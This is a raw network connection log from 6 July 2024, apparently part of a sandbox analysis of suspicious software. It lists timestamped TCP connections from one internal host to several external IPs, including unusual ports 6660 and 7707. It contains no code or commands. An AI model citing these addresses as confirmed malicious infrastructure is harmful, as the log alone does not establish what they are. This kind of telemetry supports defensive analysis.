Jul 6, 2024 13:28:40.407028913 CEST	443	49882	172.67.196.114	192.168.2.4
Jul 6, 2024 13:28:40.407093048 CEST	443	49882	172.67.196.114	192.168.2.4
Jul 6, 2024 13:28:40.407366037 CEST	49882	443	192.168.2.4	172.67.196.114
Jul 6, 2024 13:28:40.409960032 CEST	49882	443	192.168.2.4	172.67.196.114
Jul 6, 2024 13:28:40.409960985 CEST	49879	80	192.168.2.4	104.16.184.241
Jul 6, 2024 13:28:40.410955906 CEST	49887	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:40.410990953 CEST	443	49887	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:40.411845922 CEST	49887	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:40.415448904 CEST	80	49879	104.16.184.241	192.168.2.4
Jul 6, 2024 13:28:40.415486097 CEST	49887	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:40.415502071 CEST	443	49887	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:40.415533066 CEST	49879	80	192.168.2.4	104.16.184.241
Jul 6, 2024 13:28:40.512398958 CEST	443	49885	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:40.512475967 CEST	443	49885	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:40.516052008 CEST	49885	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:40.516210079 CEST	49885	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:41.046327114 CEST	443	49887	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:41.046396017 CEST	49887	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:41.047950029 CEST	49887	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:41.047957897 CEST	443	49887	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:41.048178911 CEST	443	49887	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:41.049345016 CEST	49887	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:41.049370050 CEST	443	49887	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:41.225071907 CEST	443	49887	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:41.225122929 CEST	443	49887	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:41.225168943 CEST	49887	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:41.226871014 CEST	49887	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:41.235297918 CEST	49888	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:41.235333920 CEST	443	49888	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:41.235404968 CEST	49888	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:41.235701084 CEST	49888	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:41.235717058 CEST	443	49888	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:41.802556992 CEST	49889	80	192.168.2.4	104.16.184.241
Jul 6, 2024 13:28:41.807565928 CEST	80	49889	104.16.184.241	192.168.2.4
Jul 6, 2024 13:28:41.807665110 CEST	49889	80	192.168.2.4	104.16.184.241
Jul 6, 2024 13:28:41.807845116 CEST	49889	80	192.168.2.4	104.16.184.241
Jul 6, 2024 13:28:41.812999964 CEST	80	49889	104.16.184.241	192.168.2.4
Jul 6, 2024 13:28:41.865593910 CEST	443	49888	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:41.869206905 CEST	49888	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:41.869235039 CEST	443	49888	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:42.192111969 CEST	443	49888	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:42.192176104 CEST	443	49888	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:42.192259073 CEST	49888	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:42.192763090 CEST	49888	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:42.274327040 CEST	80	49889	104.16.184.241	192.168.2.4
Jul 6, 2024 13:28:42.346323013 CEST	49889	80	192.168.2.4	104.16.184.241
Jul 6, 2024 13:28:42.635520935 CEST	49890	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:42.635570049 CEST	443	49890	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:42.635765076 CEST	49890	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:42.682323933 CEST	49890	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:42.682342052 CEST	443	49890	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:42.751862049 CEST	49891	443	192.168.2.4	172.67.196.114
Jul 6, 2024 13:28:42.751889944 CEST	443	49891	172.67.196.114	192.168.2.4
Jul 6, 2024 13:28:42.751976967 CEST	49891	443	192.168.2.4	172.67.196.114
Jul 6, 2024 13:28:42.755619049 CEST	49891	443	192.168.2.4	172.67.196.114
Jul 6, 2024 13:28:42.755634069 CEST	443	49891	172.67.196.114	192.168.2.4
Jul 6, 2024 13:28:43.296432972 CEST	443	49891	172.67.196.114	192.168.2.4
Jul 6, 2024 13:28:43.296506882 CEST	49891	443	192.168.2.4	172.67.196.114
Jul 6, 2024 13:28:43.297882080 CEST	49891	443	192.168.2.4	172.67.196.114
Jul 6, 2024 13:28:43.297888994 CEST	443	49891	172.67.196.114	192.168.2.4
Jul 6, 2024 13:28:43.298110962 CEST	443	49891	172.67.196.114	192.168.2.4
Jul 6, 2024 13:28:43.440073013 CEST	49891	443	192.168.2.4	172.67.196.114
Jul 6, 2024 13:28:43.519501925 CEST	49891	443	192.168.2.4	172.67.196.114
Jul 6, 2024 13:28:43.560503006 CEST	443	49891	172.67.196.114	192.168.2.4
Jul 6, 2024 13:28:43.627314091 CEST	443	49891	172.67.196.114	192.168.2.4
Jul 6, 2024 13:28:43.627361059 CEST	443	49891	172.67.196.114	192.168.2.4
Jul 6, 2024 13:28:43.627439022 CEST	49891	443	192.168.2.4	172.67.196.114
Jul 6, 2024 13:28:43.630425930 CEST	443	49890	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:43.642348051 CEST	49891	443	192.168.2.4	172.67.196.114
Jul 6, 2024 13:28:43.646131992 CEST	49892	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:43.646171093 CEST	443	49892	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:43.646244049 CEST	49892	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:43.646576881 CEST	49892	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:43.646588087 CEST	443	49892	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:43.647700071 CEST	49889	80	192.168.2.4	104.16.184.241
Jul 6, 2024 13:28:43.652934074 CEST	80	49889	104.16.184.241	192.168.2.4
Jul 6, 2024 13:28:43.655314922 CEST	49889	80	192.168.2.4	104.16.184.241
Jul 6, 2024 13:28:43.752571106 CEST	49890	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.018125057 CEST	49890	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.018155098 CEST	443	49890	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.063422918 CEST	80	49886	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:44.063940048 CEST	80	49886	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:44.063988924 CEST	49886	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:44.068644047 CEST	49886	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:44.217181921 CEST	49893	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:44.222037077 CEST	80	49893	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:44.222115040 CEST	49893	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:44.222148895 CEST	49893	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:44.226907969 CEST	80	49893	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:44.226982117 CEST	49893	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:44.231875896 CEST	80	49893	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:44.246550083 CEST	443	49890	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.253916025 CEST	443	49892	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.254008055 CEST	49892	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.255399942 CEST	49892	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.255408049 CEST	443	49892	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.255631924 CEST	443	49892	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.256911993 CEST	49892	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.256946087 CEST	443	49892	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.350668907 CEST	49890	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.350680113 CEST	443	49890	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.352135897 CEST	49890	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.352140903 CEST	443	49890	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.352266073 CEST	49890	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.352282047 CEST	443	49890	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.355808973 CEST	49890	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.355825901 CEST	443	49890	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.357490063 CEST	49890	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.357511997 CEST	443	49890	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.357585907 CEST	49890	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.357604027 CEST	443	49890	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.357621908 CEST	49890	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.357625961 CEST	443	49890	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.357660055 CEST	49890	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.357670069 CEST	443	49890	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.357728004 CEST	49890	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.357734919 CEST	443	49890	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.358062983 CEST	49890	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.358067989 CEST	443	49890	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.430104971 CEST	443	49892	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.430145979 CEST	443	49892	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.430214882 CEST	49892	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.443717003 CEST	49892	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.452930927 CEST	49894	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.452961922 CEST	443	49894	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.453032017 CEST	49894	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.453506947 CEST	49894	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.453521013 CEST	443	49894	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.914000988 CEST	443	49890	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.914078951 CEST	443	49890	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:44.914149046 CEST	49890	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.914655924 CEST	49890	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:44.927882910 CEST	49895	443	192.168.2.4	172.67.19.24
Jul 6, 2024 13:28:44.927903891 CEST	443	49895	172.67.19.24	192.168.2.4
Jul 6, 2024 13:28:44.928200960 CEST	49895	443	192.168.2.4	172.67.19.24
Jul 6, 2024 13:28:44.928492069 CEST	49895	443	192.168.2.4	172.67.19.24
Jul 6, 2024 13:28:44.928503036 CEST	443	49895	172.67.19.24	192.168.2.4
Jul 6, 2024 13:28:44.962307930 CEST	80	49893	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:44.963552952 CEST	80	49893	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:44.963608027 CEST	49893	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:44.965667963 CEST	49893	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:45.081655025 CEST	49896	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:45.086528063 CEST	80	49896	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:45.086591959 CEST	49896	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:45.086632967 CEST	49896	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:45.091599941 CEST	80	49896	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:45.091665030 CEST	49896	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:45.096853018 CEST	80	49896	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:45.099015951 CEST	443	49894	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:45.105328083 CEST	49894	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:45.105350018 CEST	443	49894	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:45.294887066 CEST	49883	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:45.295263052 CEST	49897	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:45.299750090 CEST	6660	49883	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:45.300076962 CEST	6660	49897	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:45.300146103 CEST	49897	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:45.300453901 CEST	49897	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:45.305246115 CEST	6660	49897	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:45.376362085 CEST	443	49894	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:45.376405001 CEST	443	49894	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:45.376581907 CEST	49894	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:45.376867056 CEST	49894	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:45.387516022 CEST	443	49895	172.67.19.24	192.168.2.4
Jul 6, 2024 13:28:45.387609005 CEST	49895	443	192.168.2.4	172.67.19.24
Jul 6, 2024 13:28:45.389375925 CEST	49895	443	192.168.2.4	172.67.19.24
Jul 6, 2024 13:28:45.389390945 CEST	443	49895	172.67.19.24	192.168.2.4
Jul 6, 2024 13:28:45.389628887 CEST	443	49895	172.67.19.24	192.168.2.4
Jul 6, 2024 13:28:45.390865088 CEST	49895	443	192.168.2.4	172.67.19.24
Jul 6, 2024 13:28:45.432501078 CEST	443	49895	172.67.19.24	192.168.2.4
Jul 6, 2024 13:28:45.521778107 CEST	443	49895	172.67.19.24	192.168.2.4
Jul 6, 2024 13:28:45.521862030 CEST	443	49895	172.67.19.24	192.168.2.4
Jul 6, 2024 13:28:45.521933079 CEST	49895	443	192.168.2.4	172.67.19.24
Jul 6, 2024 13:28:45.523042917 CEST	49895	443	192.168.2.4	172.67.19.24
Jul 6, 2024 13:28:45.571952105 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:45.571969986 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:45.572036028 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:45.572271109 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:45.572284937 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:45.756436110 CEST	49899	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:45.756467104 CEST	443	49899	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:45.756536007 CEST	49899	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:45.789647102 CEST	80	49896	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:45.790613890 CEST	80	49896	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:45.790846109 CEST	49896	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:45.793526888 CEST	49896	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:45.847213030 CEST	49899	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:45.847250938 CEST	443	49899	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:45.909507036 CEST	49900	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:45.914339066 CEST	80	49900	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:45.914411068 CEST	49900	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:45.914532900 CEST	49900	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:45.919336081 CEST	80	49900	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:45.919430971 CEST	49900	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:45.924273968 CEST	80	49900	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:46.178353071 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.346328020 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.423535109 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.423556089 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.585637093 CEST	443	49899	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.611335039 CEST	49899	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.611358881 CEST	443	49899	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.747663021 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.753660917 CEST	80	49900	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:46.754223108 CEST	80	49900	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:46.754327059 CEST	49900	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:46.757133961 CEST	49900	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:46.769859076 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.769880056 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.770035028 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.770040035 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.821585894 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.821605921 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.821671009 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.821676970 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.863079071 CEST	49901	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:46.868099928 CEST	80	49901	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:46.868201017 CEST	49901	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:46.868284941 CEST	49901	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:46.873157978 CEST	80	49901	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:46.874512911 CEST	49901	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:46.879293919 CEST	80	49901	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:46.884664059 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.884681940 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.886099100 CEST	443	49899	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.901025057 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.901036978 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.902916908 CEST	49899	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.902944088 CEST	443	49899	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.903184891 CEST	49899	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.903188944 CEST	443	49899	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.903271914 CEST	49899	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.903287888 CEST	443	49899	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.903826952 CEST	49899	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.903846979 CEST	443	49899	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.903969049 CEST	49899	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.903995037 CEST	443	49899	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.904088974 CEST	49899	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.904099941 CEST	443	49899	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.904155016 CEST	49899	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.904165983 CEST	443	49899	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.904273033 CEST	49899	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.904280901 CEST	443	49899	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.904293060 CEST	49899	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.904299021 CEST	443	49899	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.904426098 CEST	49899	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.904447079 CEST	443	49899	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.924302101 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.924314976 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.950252056 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.950268984 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:46.956337929 CEST	6660	49897	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:46.956403971 CEST	49897	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:46.991386890 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:46.991409063 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:47.003184080 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:47.003191948 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:47.033478022 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:47.033497095 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:47.048549891 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:47.048562050 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:47.081052065 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:47.081058025 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:47.255070925 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:47.255151033 CEST	443	49898	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:47.255213022 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:47.256277084 CEST	49898	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:47.492156029 CEST	443	49899	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:47.492228031 CEST	443	49899	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:47.492273092 CEST	49899	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:47.492763996 CEST	49899	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:47.493829012 CEST	49903	443	192.168.2.4	172.67.19.24
Jul 6, 2024 13:28:47.493865013 CEST	443	49903	172.67.19.24	192.168.2.4
Jul 6, 2024 13:28:47.493932962 CEST	49903	443	192.168.2.4	172.67.19.24
Jul 6, 2024 13:28:47.494165897 CEST	49903	443	192.168.2.4	172.67.19.24
Jul 6, 2024 13:28:47.494182110 CEST	443	49903	172.67.19.24	192.168.2.4
Jul 6, 2024 13:28:47.617403030 CEST	80	49901	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:47.618174076 CEST	80	49901	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:47.618247032 CEST	49901	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:47.621535063 CEST	49901	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:47.737759113 CEST	49904	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:47.745661020 CEST	80	49904	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:47.745754004 CEST	49904	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:47.745851040 CEST	49904	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:47.754014969 CEST	80	49904	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:47.754070997 CEST	49904	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:47.761885881 CEST	80	49904	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:47.970210075 CEST	443	49903	172.67.19.24	192.168.2.4
Jul 6, 2024 13:28:47.970290899 CEST	49903	443	192.168.2.4	172.67.19.24
Jul 6, 2024 13:28:47.971972942 CEST	49903	443	192.168.2.4	172.67.19.24
Jul 6, 2024 13:28:47.971985102 CEST	443	49903	172.67.19.24	192.168.2.4
Jul 6, 2024 13:28:47.972223043 CEST	443	49903	172.67.19.24	192.168.2.4
Jul 6, 2024 13:28:47.973722935 CEST	49903	443	192.168.2.4	172.67.19.24
Jul 6, 2024 13:28:48.016503096 CEST	443	49903	172.67.19.24	192.168.2.4
Jul 6, 2024 13:28:48.123375893 CEST	443	49903	172.67.19.24	192.168.2.4
Jul 6, 2024 13:28:48.123461008 CEST	443	49903	172.67.19.24	192.168.2.4
Jul 6, 2024 13:28:48.123583078 CEST	49903	443	192.168.2.4	172.67.19.24
Jul 6, 2024 13:28:48.123922110 CEST	49903	443	192.168.2.4	172.67.19.24
Jul 6, 2024 13:28:48.143954992 CEST	49905	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:48.143976927 CEST	443	49905	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:48.144048929 CEST	49905	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:48.144727945 CEST	49905	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:48.144747972 CEST	443	49905	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:48.485898018 CEST	80	49904	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:48.486706972 CEST	80	49904	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:48.486757994 CEST	49904	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:48.490374088 CEST	49904	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:48.603152037 CEST	49906	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:48.608118057 CEST	80	49906	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:48.611809969 CEST	49906	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:48.614243031 CEST	49906	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:48.619326115 CEST	80	49906	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:48.619786024 CEST	49906	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:48.624682903 CEST	80	49906	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:48.658023119 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:48.663249969 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:48.663320065 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:48.668221951 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:48.783467054 CEST	443	49905	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:48.785227060 CEST	49905	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:48.785243034 CEST	443	49905	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:48.987631083 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:49.049453020 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:49.097872972 CEST	443	49905	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:49.098134995 CEST	49905	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:49.098145008 CEST	443	49905	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:49.098340988 CEST	49905	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:49.098360062 CEST	443	49905	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:49.098458052 CEST	49905	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:49.098479986 CEST	443	49905	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:49.098745108 CEST	49905	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:49.098759890 CEST	443	49905	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:49.099126101 CEST	49905	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:49.099139929 CEST	443	49905	149.154.167.220	192.168.2.4
